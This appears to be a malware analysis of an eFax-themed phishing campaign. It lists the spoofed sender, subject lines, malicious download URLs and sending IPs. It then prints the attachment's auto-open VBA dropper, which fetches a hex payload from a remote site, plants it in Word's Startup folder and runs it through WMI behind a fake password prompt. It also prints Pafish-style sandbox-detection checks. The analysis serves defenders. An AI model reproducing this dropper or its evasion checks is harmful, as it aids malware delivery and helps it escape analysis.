- Sender
- ========
- eFax j2 Global, Inc. <eFax@shiplawyer.com>
- Subjects
- =========
- You've received efax Notification
- You have received efax Message
- This is efax Notice
- This is an electronic eFax Notice
- You've got eFax Notice
- This is an electronic eFax Notification
- This is eFax Notification
- You've received eFax Notice
- Embedded links
- ===============
- http://cmstephensconsulting.com/7izt/rjdcowboy.php
- http://dbh.dixitninad.com/.well-known/sylvek1978.php
- http://developermurtaza.website/js/wilsonderyeck.php
- http://directoryredlands.com/wp-content/tmeyer42.php
- http://matexpress.com/map/shaneogrady.php
- http://nchr.vn/wp-content/seanbwarbird.php
- http://rva.agentgrowthpartners.com/.well-known/williamw141955.php
- http://sha256.uaround.ru/presentation/wmatthews11.php
- http://socialprofile.in/scopic/walli_sw.php
- http://spsconsultancyservices.com/wp-admin/sti.plus.php
- http://swacvirals.com/wp-admin/walpasley.php
- http://wondarshop.in/assests/zumathe.php
- http://workxpro.co.in/wp-admin/rklug.php
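- Email IPs (each entry: name given by the sending host, then reverse DNS and [IP]; the layout looks like mail Received headers)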
- ===========
- shiplawyer.com (173-167-51-106-cpennsylvania.hfc.comcastbusiness.net [173.167.51.106])
- shiplawyer.com (rrcs-71-40-138-178.se.biz.rr.com [71.40.138.178])
- shiplawyer.com (24-35-137-143.fidnet.com [24.35.137.143])
- shiplawyer.com (h207.163.117.75.dynamic.ip.windstream.net [75.117.163.207])
- shiplawyer.com (c-73-154-113-150.hsd1.wv.comcast.net [73.154.113.150])
- shiplawyer.com (071-045-160-192.res.spectrum.com [71.45.160.192])
- shiplawyer.com (72-16-245-65.customerip.birch.net [72.16.245.65])
- shiplawyer.com ([76.4.44.68])
- shiplawyer.com (66-188-168-9.dhcp.stcd.mn.charter.com [66.188.168.9])
- shiplawyer.com (64-72-38-48.flntcmtc01.com.sta.suddenlink.net [64.72.38.48])
- shiplawyer.com (static-71-172-32-163.nwrknj.fios.verizon.net [71.172.32.163])
- shiplawyer.com ([206.63.185.26])
- shiplawyer.com (50-255-199-149-static.hfc.comcastbusiness.net [50.255.199.149])
- shiplawyer.com ([12.180.172.18])
- shiplawyer.com ([66.209.42.145])
- shiplawyer.com ([96.71.254.6])
- shiplawyer.com (h121.205.191.173.dynamic.ip.windstream.net [173.191.205.121])
- shiplawyer.com ([199.190.54.215])
- shiplawyer.com (50-252-19-58-static.hfc.comcastbusiness.net [50.252.19.58])
- shiplawyer.com (cpe-75-86-78-26.wi.res.rr.com [75.86.78.26])
- shiplawyer.com (c-24-6-32-99.hsd1.ca.comcast.net [24.6.32.99])
- shiplawyer.com (c-68-37-17-12.hsd1.mi.comcast.net [68.37.17.12])
- shiplawyer.com (h121.205.191.173.dynamic.ip.windstream.net [173.191.205.121])
- shiplawyer.com (rrcs-208-125-27-66.nyc.biz.rr.com [208.125.27.66])
- shiplawyer.com (cpe-104-172-16-234.socal.res.rr.com [104.172.16.234])
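- Munin results (both attachment hashes came back "Unknown" to the lookup services at the time of the run, which is not a clean verdict)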
- ===============
- _________ _ _ ______ _____ ______
- | | | | | \ | | | | | | \ \ | | | | \ \ /.)
- | | | | | | | | | | | | | | | | | | | | /)\|
- |_| |_| |_| \_|__|_| |_| |_| _|_|_ |_| |_| // /
- /'" "
- Online Hash Checker for Virustotal and Other Services
- Florian Roth - 0.13.0 April 2019
- [+] Found results CSV from previous run: check-results_attach.csv
- [+] Appending results to file: check-results_attach.csv
- [ ] Processing /attach/e_fax_46164.doc ...
- [ ] Processing /attach/e_fax_46164_4616.zip ...
- [+] Processing 2 lines ...
- 1 / 2 > Unknown
- HASH: a8645292476686686c82fe04f5378f7e0d141b2bcf54c89970a18cc366342a1d COMMENT: /attach/e_fax_46164.doc
- RESULT: - / -
- 2 / 2 > Unknown
- HASH: 81b35cdf0d1e8a239641c25dd32165d658992f1a9058190b0ae773fc70bd8725 COMMENT: /attach/e_fax_46164_4616.zip
- RESULT: - / -
- Macro script
- ==============
- ' Auto-open entry point (mixed-case spelling of AutoOpen): runs when the document is opened with macros enabled and only calls loYscbk.
- Sub AutoopeN(): loYscbk: End Sub
- ' Dropper routine called from the auto-open stub: fetches hex text from a web page, writes the
- ' decoded bytes into the Word Startup folder, starts regsvr32.exe through WMI, then shows a decoy.
- ' NOTE(review): string literals in this listing carry no quotes and some operators/arguments
- ' look lost in the paste, so the code is not runnable as shown.
- Sub loYscbk()
- ' Suppress every runtime error so failures stay silent.
- On Error Resume Next
- ' Drive Internet Explorer through COM for the download.
- Set ess = CreateObject(InternetExplorer.Application)
- ' Runs before RSOgEnmZmP and p are assigned further down; the error is swallowed by On Error Resume Next.
- RSOgEnmZmP.CreateFolder (p)
- ' Payload staging URL (network indicator).
- ess.Navigate http://maritimelawyers.us/download.html
- State = 0
- ' Busy-wait until the page reports readyState 4.
- Do Until State = 4: DoEvents: State = ess.readyState: Loop
- ' Payload text is the content of the first <pre> element on the page.
- Dim RlAqIQeVT: RlAqIQeVT = ess.Document.Body.getElementsByTagName(pre).Item(0).innerHTML
- ' Target directory: the per-user Word Startup folder under APPDATA.
- p = Environ(APPDATA) & \Microsoft\Word\Startup\
- Set RSOgEnmZmP = CreateObject(Scripting.FileSystemObject)
- If Not RSOgEnmZmP.FolderExists(p) Then
- RSOgEnmZmP.CreateFolder (p)
- End If
- Randomize
- ' File name is a random number followed by F.wll; the operator before "1" appears lost in the paste.
- p = p & Int(Rnd * 999) 1 & F.wll
- Set objFile = RSOgEnmZmP.CreateTextFile(p, True)
- ' Decode the page text two characters at a time as hex bytes and write them to the file.
- With objFile: For lp = 1 To Len(RlAqIQeVT) Step 2: .Write Chr(CByte(&H & Mid(RlAqIQeVT, lp, 2))): Next: End With: objFile.Close
- ' Process creation goes through the WMI Win32_Process class instead of a direct shell call.
- ' NOTE(review): a process created this way is normally parented by the WMI provider host, not Word - confirm in telemetry.
- Set objWMIService = GetObject(winmgmts:Win32_Process)
- ' The regsvr32.exe command line appears truncated in this listing.
- objWMIService.Create regsvr32.exe-sp,,,processid
- ' Decoy: password prompt text plus a user form, after which Word is closed.
- MsgBox The document is protected, you will need to specify a password to unlock.
- Dim myUserForm As UserForm1
- Set myUserForm = New UserForm1
- myUserForm.Show
- Application.Quit
- End Sub
- Questionable part of script (environment / analysis-sandbox checks; the file and log names in it reference "Pafish")
- =============================
- ' Reports DETECTED when any application name returned by WordBasic.AppGetNames contains
- ' one of the virtualization or analysis-tool strings in tns (case-insensitive substring match).
- Public Sub checkApps()
- printMsg "[*] WordBasic.AppGetNames ..."
- d = False
- tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
- ' ws is assigned here but not used anywhere else in this routine.
- Set ws = GetObject("winmgmts:\\.\root\cimv2")
- Dim names() As String
- ' Size the array from the application count, then fill it with the application names.
- ReDim names(WordBasic.AppCount())
- WordBasic.AppGetNames names
- For Each n In names
- For Each tn In tns
- If InStr(LCase(n), tn) > 0 Then
- d = True
- End If
- Next
- Next
- If d Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Reports DETECTED when WordBasic.AppCount() returns fewer than 50, otherwise OK.
- ' NOTE(review): presumably a low count is taken as a sign of a bare analysis machine.
- Public Sub checkAppCount()
- printMsg "[*] Checking WordBasic.AppCount() ..."
- If WordBasic.AppCount() < 50 Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Reports DETECTED when the active document is not named exactly "Pafish.docm",
- ' i.e. when the file was renamed before being opened.
- Public Sub checkPreciseFileName()
- printMsg "[*] Checking Precise Filename ..."
- badName = False
- If ActiveDocument.Name <> "Pafish.docm" Then
- badName = True
- End If
- If badName Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Walks the document name one character at a time, counts matches against hexchars, and reports
- ' DETECTED when the count reaches the name length minus 5.
- ' NOTE(review): the intent looks like spotting hash-style file names, but InStr(s, hexchars) looks for
- ' the whole 16-character string inside the single character s, so c stays 0 as written.
- Public Sub checkFilenameHash()
- printMsg "[*] Checking Filename Hashname ..."
- hexchars = "0123456789abcdef"
- c = 0
- For i = 1 To Len(ThisDocument.Name)
- s = Mid(LCase(ThisDocument.Name), i, 1)
- If InStr(s, hexchars) > 0 Then
- c = c + 1
- End If
- Next
- ' With c at 0 this is true only for names of five characters or fewer.
- If c >= (Len(ThisDocument.Name) - 5) Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Reports DETECTED when the lower-cased full path of the active document contains
- ' any of the strings in badNames.
- Public Sub checkFilenameBad()
- printMsg "[*] Checking Bad Filename ..."
- badName = False
- ' NOTE(review): "Desktop" has a capital D while the path is lower-cased below, so that entry cannot match as written.
- badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")
- For Each n In badNames
- If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
- badName = True
- End If
- Next
- If badName Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Reports DETECTED when the name of any entry in Application.Tasks contains one of the
- ' virtualization or analysis-tool strings in badTaskNames (case-insensitive substring match).
- Public Sub checkTasks()
- printMsg "[*] Checking Application.Tasks.Name ..."
- badTask = False
- badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
- For Each Task In Application.Tasks
- For Each badTaskName In badTaskNames
- If InStr(LCase(Task.Name), badTaskName) > 0 Then
- badTask = True
- End If
- Next
- Next
- If badTask Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Queries Win32_Processor over WMI and reports DETECTED when any processor
- ' reports fewer than 3 cores.
- Public Sub checkCores()
- printMsg "[*] Checking Win32_Processor.NumberOfCores ..."
- ' Starts as the number 0 and is later set to True; both work in the If test below.
- badCores = 0
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- ' 48 is the flags argument of ExecQuery.
- Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
- For Each objItem In colItems
- If objItem.NumberOfCores < 3 Then
- badCores = True
- End If
- Next
- If badCores Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Queries Win32_Bios over WMI and reports DETECTED when the lower-cased SMBIOSBIOSVersion
- ' or SerialNumber contains one of the hypervisor names in badBiosNames.
- Public Sub checkBios()
- printMsg "[*] Checking Win32_Bios.SMBIOSBIOSVersion & SerialNumber ..."
- badBios = False
- badBiosNames = Array("virtualbox", "vmware", "kvm")
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
- For Each objItem In colItems
- For Each badName In badBiosNames
- If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
- badBios = True
- End If
- If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
- badBios = True
- End If
- Next
- Next
- If badBios Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Queries Win32_PnPEntity over WMI and compares each DeviceId with the vendor-ID
- ' strings in badPNPNames, reporting DETECTED on a match.
- Public Sub checkPnP()
- printMsg "[*] Checking Win32_PnPEntity.DeviceId ..."
- badPNP = False
- ' NOTE(review): these look like the PCI vendor IDs used by VirtualBox (80EE) and VMware (15AD) - confirm.
- badPNPNames = Array("VEN_80EE", "VEN_15AD")
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
- For Each objItem In colItems
- For Each badName In badPNPNames
- ' DeviceId is lower-cased while the tokens are upper-case, so this comparison cannot match as written.
- If InStr(LCase(objItem.DeviceId), badName) > 0 Then
- badPNP = True
- End If
- Next
- Next
- If badPNP Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Queries Win32_ComputerSystem over WMI and reports DETECTED when the lower-cased UserName
- ' contains one of the strings in badUsernames.
- Public Sub checkUsername()
- printMsg "[*] Checking Win32_ComputerSystem.Username ..."
- badUsername = False
- ' Substring match, so any account name containing "admin" or "test" also triggers it.
- badUsernames = Array("admin", "malfind", "sandbox", "test")
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
- For Each objItem In colItems
- For Each badName In badUsernames
- If InStr(LCase(objItem.UserName), badName) > 0 Then
- badUsername = True
- End If
- Next
- Next
- If badUsername Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Queries Win32_ComputerSystem over WMI and reports OK when the machine is part of a domain,
- ' DETECTED when it is not (the result sense is the reverse of the name-matching checks).
- Public Sub checkPartOfDomain()
- printMsg "[*] Checking Win32_ComputerSystem.PartOfDomain ..."
- partOfDomain = False
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
- For Each objItem In colItems
- If objItem.partOfDomain Then
- partOfDomain = True
- End If
- Next
- If partOfDomain Then
- printMsg "OK"
- Else
- printMsg "DETECTED"
- End If
- End Sub
- ' Tests whether the document has a ":Zone.Identifier" alternate data stream next to it.
- ' Reports OK when the stream exists and DETECTED when it is missing.
- ' NOTE(review): the stream is normally added to downloaded files, so its absence presumably
- ' suggests the sample was copied in by other means - confirm against sandbox submission flow.
- Public Sub checkZoneIdentifier()
- printMsg "[*] Checking Zone.Identifier ..."
- If CreateObject("Scripting.FileSystemObject").fiLEExistS(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
- printMsg "OK"
- Else
- printMsg "DETECTED"
- End If
- End Sub
- ' Reports DETECTED when Application.Tasks holds fewer than 3 entries, otherwise OK.
- Public Sub checkNbrOfTask()
- printMsg "[*] Checking Application.Tasks.Count ..."
- If Application.Tasks.Count < 3 Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Reports DETECTED when Word's recent-files list holds fewer than 3 entries, otherwise OK.
- ' NOTE(review): presumably a near-empty list is taken as a sign of a freshly built analysis image.
- Public Sub checkRecentDocs()
- printMsg "[*] Checking Application.RecentFiles.Count ..."
- If Application.RecentFiles.Count < 3 Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- ' Appends msg to the body of the active document and rewrites the log file "pafish.log"
- ' with the document text. No return value is assigned.
- Public Function printMsg(msg)
- ActiveDocument.Range.Text = ActiveDocument.Range.Text & msg
- Set RSOgEnmZmP = CreateObject("Scripting.FileSystemObject")
- ' Relative path: the log lands in whatever the current directory is (host artifact for analysts).
- outFile = "pafish.log"
- ' Second argument True overwrites any existing file on every call.
- Set objFile = RSOgEnmZmP.CreateTextFile(outFile, True)
- ' The document text already contains msg from the first line, so msg is written a second time here.
- objFile.Write ActiveDocument.Range.Text & msg
- objFile.Close
- End Function
- ' Formats the result listing in the active document: lines equal to "OK" are coloured green,
- ' lines equal to "DETECTED" red, then paragraph spacing and font size are normalised.
- Public Sub mark()
- Text = ActiveDocument.Range.Text
- ' One token per paragraph (split on carriage return).
- toks = Split(Text, vbCr)
- ' c tracks the character offset of the current token inside the document.
- c = 0
- For Each tok In toks
- l = Len(tok)
- If tok = "OK" Then
- ActiveDocument.Range(c, c + l).Font.Color = vbGreen
- End If
- If tok = "DETECTED" Then
- ActiveDocument.Range(c, c + l).Font.Color = vbRed
- End If
- ' Advance past the token and its separator.
- c = c + l + 1
- Next
- ActiveDocument.Range.ParagraphFormat.SpaceBefore = 0
- ActiveDocument.Range.ParagraphFormat.SpaceAfter = 0
- ActiveDocument.Range.Font.Size = 8
- End Sub